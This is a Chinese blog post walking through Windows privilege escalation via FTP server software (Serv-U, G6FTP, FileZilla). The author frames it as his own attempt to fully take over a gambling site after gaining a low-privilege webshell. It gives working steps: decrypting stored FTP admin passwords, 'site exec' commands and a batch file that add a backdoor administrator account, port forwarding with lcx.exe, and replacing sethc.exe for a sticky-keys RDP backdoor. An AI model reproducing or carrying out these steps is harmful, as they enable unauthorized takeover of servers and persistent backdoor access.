Error message here!

Hide Error message here!

忘记密码?

Error message here!

请输入正确邮箱

Hide Error message here!

密码丢失?请输入您的电子邮件地址。您将收到一个重设密码链接。

Error message here!

返回登录

Close

windows提权之ftp提权

v01cano 2019-01-23 19:11:00 阅读数:417 评论数:0 点赞数:0 收藏数:0

windows提权之ftp提权

0,起因,由于前几天拿了一个菠菜站的webshell,但是只有iis权限,执行无法创建用户等操作,更无法对整个服务器进行控制了,于是此时便需要提权了,对于一个刚刚入门的小白来说,此刻真正意识到了提权的重要性,于是便开始学习提取相关知识,以拿下该菠菜的站点。

提权前的准备工作

1,通常来说,不同的脚本所处的权限是不一样的。这就意味着,如果该站点支持权限更高的脚本,我们可以上传该权限更高的脚本的大马,进而拿到更高的权限。

  • asp/php 通常为匿名权限(网络服务权限)
  • aspx 通常为user权限
  • jsp 通常为系统权限

2,提权中常常也需要进行信息收集:

  • 内外网
  • 服务器系统和版本位数
  • 服务器的补丁情况
  • 服务器的安装软件情况
  • 服务器的防护软件情况
  • 端口情况
  • 所支持的脚本情况
  • ...............................等等

3,windows信息收集中常用的命令:

ipconfig /all 查看当前ip
net user 查看当前服务器账号情况
netstat -ano 查看当前服务器端口开放情况
ver 查看当前服务器操作系统
systeminfo 查看当前服务器配置信息(补丁情况)
tasklist /svc 查看当前服务器进程情况
taskkill -pid pid号 结束某个pid号的进程
taskkill /im qq.exe /f 结束qq进程,如果对命令不清楚,可以使用taskkill /? 进行查看
net user v01cano v01cano /add 添加一个用户名为v01cano密码为v01cano的用户
net localgroup administrators v01cano /add 将用户v01cano添加到管理员组
whoami 查看当前操作用户(当前权限)
query user 查看管理员的登入时间

4,FTP软件提权:

常见的FTP软件有server-u,g6ftp,filezilla。

server-u提权

  • Server -u的默认端口为43958

server-u提权常用方法,一:

1,查看默认安装目录下的ServUDaemon.ini文件,进而查看用户名和密码,将密码去cmd5.com找到对应的server-u的解密方式进行解密。

2,登入ftp,执行如下命令,创建用户,并且加入到管理员组。

quote site exec net user v01cano v01cano /add
quote site exec net localgroup administrators v01cano /add

server-u提权常用方法二:

1,使用大马直接创建ftp账号,使用ftp账号登入ftp。

2,然后再执行如下命令,创建系统账号。

quote site exec net user v01cano v01cano /add
quote site exec net localgroup administrators v01cano /add

server-u提权常用方法三:

server-u的管理员账号权限较大,相当于系统权限,可以通过管理员账号直接创建用户,并且加入到管理员组。

g6ftp提权:

科普:g6ftp的默认端口为8021,只侦听在127.0.0.1的8021端口上,所以无法从外部直接访问,需要进行端口转发。

1,查找管理配置文件Remote.ini,将administrator管理密码解密。解密得到administrator的管理员密码为123456

2,首先进行查找该网站的可读可写目录,然后上传cmd.exe和lcx.exe到该目录下。

3,查看网站根目录的权限得知,此处网站的根目录可读可写,直接上传到网站跟目录即可。上传成功后,即可直接通过cmd.exe调用lcx.exe命令,查看lcx.exe的用法。

然后通过如下命令转发端口,将127.0.0.1的8021端口通过8427端口转发出去:

4,转发成功后,通过g6ftp软件进行连接,以管理员用户登入

连接成功:

5,创建用户并设置权限和执行批处理文件

创建用户:右键,选择new user

选择根目录为c盘:

赋予全部权限:

然后将批处理文件adduser.bat上传到目标站点中:
adduser.bat中的文件内容为:即新建一个用户名和密码均为v01cano的用户,并且加入到管理员组中。

net user v01cano v01cano /add
net localgroup administrators v01cano /add

然后在g6ftp软件中加入批处理命令:

然后在控制台登录ftp,并且执行所加入的批处理命令:命令成功执行:

在目标机上查看,新建用户成功,并且成功加入到了管理员组。

提权成功。

filezilla提权:

科普:filezilla默认端口为14147端口

1,找到默认安装目录下面有两个敏感文件filezillaserver.xml(包含了用户信息)和filezillaserver interface.xml(包含了管理信息),查看用户名和密码:

2,进行端口转发,方法类似g6ftp:

3,使用filezilla软件进行远程连接:

4,新建用户并设置用户的根目录。

5,打开filezilla客户端软件,使用刚刚新建的用户名和密码进行连接:

6,连接成功以后,替换c:/windows/system32/sethc.exe文件。

7,直接远程连接即可,win+r输入mstsc即可打开远程桌面。输入靶机ip进行连接:不需要输入用户名和密码,直接连续按下5次shift键,即可以管理员的身份打开cmd,然后创建用户,或者直接输入explorer.exe,进入靶机。远控成功。

版权声明
本文为[v01cano]所创,转载请带上原文链接,感谢
https://www.cnblogs.com/v01cano/p/10310822.html

编程之旅,人生之路,不止于编程,还有诗和远方。
阅代码原理,看框架知识,学企业实践;
赏诗词,读日记,踏人生之路,观世界之行;

支付宝红包,每日可领